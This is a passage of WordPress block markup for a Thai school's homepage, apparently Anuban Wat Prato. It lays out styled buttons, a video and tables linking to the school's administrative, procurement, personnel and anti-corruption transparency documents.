500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"b0641f20\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":260,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" class=\"wp-image-260\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br>   <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br>      <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br>       <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br>     <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  - คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZCEZ5hxcJ5yfJGw3L1Kz5EAXscsQ0sTV/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZCEZ5hxcJ5yfJGw3L1Kz5EAXscsQ0sTV/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">ร</a><a href=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\">ายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม  No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" 